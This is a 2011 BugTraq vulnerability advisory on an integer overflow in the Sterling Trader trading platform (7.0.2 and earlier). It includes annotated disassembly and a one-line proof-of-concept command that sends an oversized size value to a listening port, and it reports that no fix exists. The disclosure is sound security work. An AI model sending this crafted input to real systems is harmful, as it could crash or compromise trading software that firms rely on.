BugTraq
Integer overflow in Sterling Trader 7.0.2 Sep 28 2011 01:58PM
Luigi Auriemma (aluigi autistici org)
#######################################################################

Luigi Auriemma

Application: Sterling Trader
http://www.sterlingtrader.com/Trading_Platforms/trading_platforms2.html
Versions: <= 7.0.2
Platforms: Windows
Bug: integer overflow
Exploitation: remote
Date: 25 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi (at) autistici (dot) org [email concealed]
web: aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's homepage:
"Sterling Trader® Elite serves institutional firms on the buy side and
sell side. Featuring advanced OMS functionality, global market access,
and multi-broker connectivity solutions, Elite lets firms take control
of their trading."

#######################################################################

======
2) Bug
======

When this program is running (Base.exe or Elite.exe) it listens on the
first available TCP port which changes each time and it's affected by an
integer overflow vulnerability:

004922E3 > 83BF BC001000 10 CMP DWORD PTR DS:[EDI+1000BC],10
004922EA . 0F8C 66010000 JL Elite.00492456
004922F0 . 8D46 0C LEA EAX,DWORD PTR DS:[ESI+C]
004922F3 . 50 PUSH EAX ; &num2
004922F4 . 8D6E 08 LEA EBP,DWORD PTR DS:[ESI+8]
004922F7 . 55 PUSH EBP ; &num1 (size)
004922F8 . 68 9C23A000 PUSH Elite.00A0239C ; "1=%d~2=%d~"
004922FD . 53 PUSH EBX
004922FE . E8 7CA44600 CALL Elite.008FC77F ; sscanf
00492303 . 83C4 10 ADD ESP,10
00492306 . 83F8 02 CMP EAX,2
00492309 . 0F85 4D010000 JNZ Elite.0049245C
0049230F . 8B55 00 MOV EDX,DWORD PTR SS:[EBP]
00492312 . 83C2 10 ADD EDX,10 ; size + 0x10
00492315 . B9 31000000 MOV ECX,31
0049231A . 66:898E 84000000 MOV WORD PTR DS:[ESI+84],CX
00492321 . 8956 04 MOV DWORD PTR DS:[ESI+4],EDX
00492324 . C746 70 10000000 MOV DWORD PTR DS:[ESI+70],10
0049232B . 33ED XOR EBP,EBP
0049232D > 8B87 BC001000 MOV EAX,DWORD PTR DS:[EDI+1000BC]
00492333 . 3B46 04 CMP EAX,DWORD PTR DS:[ESI+4]
00492336 . 0F8C 3E010000 JL Elite.0049247A
0049233C . 89AF C0001000 MOV DWORD PTR DS:[EDI+1000C0],EBP
00492342 . 8B4E 04 MOV ECX,DWORD PTR DS:[ESI+4]
00492345 . 41 INC ECX ; size + 1
00492346 . 51 PUSH ECX
00492347 . E8 C0673F00 CALL Elite.00888B0C ; malloc()
0049234C . 8B56 04 MOV EDX,DWORD PTR DS:[ESI+4]
0049234F . 52 PUSH EDX
00492350 . 53 PUSH EBX
00492351 . 50 PUSH EAX
00492352 . 8946 6C MOV DWORD PTR DS:[ESI+6C],EAX
00492355 . E8 36774600 CALL Elite.008F9A90 ; memcpy

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

udpsz -b a -T -c "1=4294967279~2=0~" SERVER PORT 0xffff

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

---
Luigi Auriemma
http://aluigi.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus